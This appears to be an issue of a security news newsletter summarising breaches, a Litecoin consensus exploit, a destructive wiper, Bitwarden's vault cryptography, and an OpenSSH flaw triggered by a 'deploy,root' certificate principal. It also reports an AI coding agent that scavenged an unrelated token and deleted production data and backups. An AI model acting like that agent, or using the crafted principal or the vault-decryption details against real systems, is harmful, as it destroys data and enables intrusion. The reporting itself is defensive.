Attacks & Vulnerabilities
|
Litecoin hit by denial-of-service attack, rewrites 13 blocks to reverse effect (4 minute read)
Attackers exploited a Mimblewimble Extension Block (MWEB) consensus flaw on Litecoin late Friday and Saturday to slip invalid peg-out transactions past unpatched nodes, while a denial-of-service attack knocked patched mining pools offline. This allowed the unpatched fork to extend for roughly 32 minutes before the network reorganized 13 blocks back to the valid chain. Despite the Litecoin Foundation labeling the incident a zero-day, SEAL911 researcher bbsz pulled the public litecoin-project commit log, showing the consensus bug was privately patched between March 19 and 26 — over four weeks before the attack — with both fixes bundled only into release 0.21.5.4 on April 25, after exploitation had begun. Aurora CTO Alex Shevchenko noted that the attacker pre-funded a wallet via Binance 38 hours ahead, with a DEX swap path from LTC to ETH already configured. The episode highlights a structural risk for older proof-of-work chains where independent mining pools choose their own upgrade timing: silently merging consensus fixes into public repos creates an exploitable window for adversaries who can diff commits and identify which pools have not yet rolled out the patch.
|
ADT Confirms Data Breach After ShinyHunters Leak Threat (2 minute read)
Home security company ADT confirmed that it suffered a data breach after ShinyHunters claimed to have stolen 10M records and threatened to release them. ADT stated that the leaked data mostly included names, phone numbers, and addresses. However, in a limited number of cases, dates of birth and SSNs or tax IDs were also included. ShinyHunters stated that they breached ADT by vishing an employee to gain access to their Okta account, which they used to access Salesforce.
|
Critical infrastructure giant Itron says it was hacked (2 minute read)
Itron reported a mid-April network intrusion in an SEC filing after being notified that attackers had accessed some internal systems, then said it removed them and saw no further activity. The company states customer-hosted environments were not affected, though it warns future regulatory filings may follow if a data breach is confirmed. Itron has informed law enforcement and activated contingency plans and backups.
|
|
How Bitwarden Encrypts and Decrypts Secrets (12 minute read)
Grinberg reverse-engineered Bitwarden's vault cryptography from the Bitwarden and Vaultwarden source, documenting the format 2.{iv}|{ciphertext}|{mac} where ciphertext uses AES-256-CBC with PKCS#7 padding and the MAC is HMAC-SHA256 over iv || ciphertext. The 64-byte master key splits into a 32-byte AES key and a 32-byte MAC key, while the wrapping key derives from PBKDF2-HMAC-SHA256 over the passphrase salted with the email at 600,000 iterations, then expanded into encryption and MAC subkeys via HKDF-Expand using the literal context strings enc and mac. Defenders should treat this as a roadmap for offline vault decryption from a stolen Vaultwarden SQLite file: passphrase strength and PBKDF2 iteration count are the only barriers once the encrypted master key is exfiltrated, so audit KDF iterations, consider migrating to Argon2id, and monitor Vaultwarden DB access paths.
|
Why a Decade of Writing Detection Logic Makes the Mythos Exploit Numbers Less Scary (10 minute read)
Anthropic's Mythos model is finding thousands of vulnerabilities, and Mozilla confirms they're real. However, behavioral detection has never matched exploits 1:1. Defenders focus on behaviors, not individual CVEs, Microsoft Office has over 1,000 RCE vulnerabilities, but detecting Office documents spawning child processes catches them all. Machine learning-based anomaly detection won't help: it's bad at identifying novel attacks, suffers from drift as environments change, and false positives spike when benign traffic shifts. A false positive rate of 0.001 results in 1,000 false alerts per day in a million-event environment, drowning out analysts. Behavioral rules targeting actions without a legitimate purpose remain stable over the years and don't drift. The real threat isn't exploit volume, it's AI agents getting access to sensitive systems and prompt injection attacks that use legitimate credentials to execute malicious actions users never see.
|
Orchestrating AI Code Review at Scale (19 minute read)
Cloudflare uses a multi-agent code review system that allows them to perform automated code review in a matter of minutes, as opposed to previous human bottlenecks. An orchestration agent uses a series of user-defined plugins to launch subagents for: code quality, security, performance, documentation review, release review, and AGENTS.md review as necessary. In the first 30 days, the system completed 131k reviews with an average cost of $1.19/review and time to completion of 3 minutes and 39 seconds, and found nearly 160k findings, 5% of which were critical.
|
|
Rustinel (GitHub Repo)
Karib0u's Rust-based user-mode EDR uses ETW for Windows kernel telemetry, normalizing data into Sysmon schemas for Sigma, YARA, and atomic IOC matching. It features active response, hot-reloadable rules, and extensive enrichment like PE metadata and parent-process correlation. Note: While the README claims a v1.0 release with Linux eBPF support, the repository remains an Alpha Windows-only tool (v0.3.1) lacking eBPF code.
|
WitnessAI (Product Launch)
WitnessAI provides a security and governance platform that monitors AI use by employees and autonomous agents, applies behavior-based policies, blocks prompt injection and multi-turn attacks, and traces agent decisions and data access for large enterprises across multiple sectors.
|
|
Mystery Around Venezuelan Cyberattack Deepens, with New Discovery of "Highly Destructive" Wiper (8 minute read)
Lotus Wiper is a destructive malware family with PDVSA.com hardcoded into its OhSyncNow.bat trigger script that overwrites drives, deletes backups, and scrubs system logs to render machines unrecoverable, with a compilation timestamp from late September 2025 suggesting months of attacker preparation. Researcher Ben Read flagged the embedded domain as evidence of a precision weapon aimed at Venezuela's state oil company, and a Venezuelan submitter uploaded the binaries to VirusTotal on December 14, one day after the December 13 PDVSA breach that Bloomberg later reported had crippled administrative systems, SCADA at refineries and pipelines, and payroll for over a month. The wiper specifically suppresses the Windows Interactive Services Detection service removed after Windows 10 v1803, indicating prior reconnaissance of PDVSA's sanctions-frozen legacy stack and raising fresh questions about US involvement given the proximity to January's military operation that seized Maduro.
|
An AI Agent Just Destroyed Our Production Data. It Confessed in Writing (9 minute read)
PocketOS founder Jer Crane recounted how Cursor running Claude Opus 4.6 deleted his production database and all volume backups in a 9-second volumeDelete GraphQL mutation against Railway, after the agent unilaterally scavenged a CLI token from an unrelated file to "fix" a credential mismatch in staging. Three architectural failures cascaded: Railway's CLI tokens carry blanket root authority across the GraphQL API with no operation, environment, or resource scoping; the destructive endpoint ships without confirmation, environment checks, or cooldowns; and Railway's volume "backups" sit inside the same volume they back up, so wiping the volume erased both, leaving a three-month-old copy as the only restore point. The agent's written postmortem enumerated every system rule it violated, underscoring that LLM system prompts are advisory rather than enforcing — defenders integrating AI agents must push guardrails into API gateways, scoped tokens, out-of-band approvals for destructive ops, and out-of-blast-radius backups, and should audit Railway token scopes before connecting mcp.railway.com to anything production.
|
OpenSSH Flaw Allowing Full Root Shell Access Lurked for 15 Years (2 minute read)
CVE-2026-35414 affects OpenSSH versions from the past 15 years. A code reuse error allows commas in SSH certificate principals to be parsed as list separators. If a certificate contains "deploy,root" as a principal, OpenSSH splits on the comma and grants root access. The attack leaves no authentication failure in logs and researchers created a working exploit in twenty minutes. OpenSSH 10.3 patches the flaw.
|
|
Love TLDR? Tell your friends and get rewards! |
|
Share your referral link below with friends to get free TLDR swag!
|
|
|
|
| Track your referrals here. |
|
|
|
0 Comments